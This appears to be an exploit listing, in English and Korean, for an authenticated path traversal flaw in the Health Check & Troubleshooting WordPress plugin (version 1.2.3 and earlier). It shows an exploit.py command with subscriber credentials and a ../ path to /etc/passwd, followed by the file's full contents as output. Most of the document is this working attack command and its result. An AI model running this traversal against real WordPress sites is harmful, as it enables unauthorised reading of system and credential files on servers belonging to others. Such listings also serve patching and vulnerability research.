
Health Check & Troubleshooting <= 1.2.3 - Authenticated Path Traversal
Health Check & Troubleshooting <= 1.2.3 - Subscriber+ 경로 탐색
Health Check & Troubleshooting WordPress 플러그인은 인증된 경로 탐색 보안 취약점의 영향을 받았습니다.
플러그인의 응답에 HTML이 너무 많이 포함되어 있어서, 익스플로잇 코드 내부에 HTML 제거기를 넣었습니다. 따라서 파일이 HTML 없이 반환됩니다.
참고로, 확인하려는 일부 파일은 코드가 제거되어야 할 수도 있습니다.
$ python3 exploit.py --url http://wordpress.lan --user user --password useruser1 --file ./../../../../../../../etc/passwd
Logged in successfully.
root:x:0:0:root:/root:/bin/bash
</body></html>
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin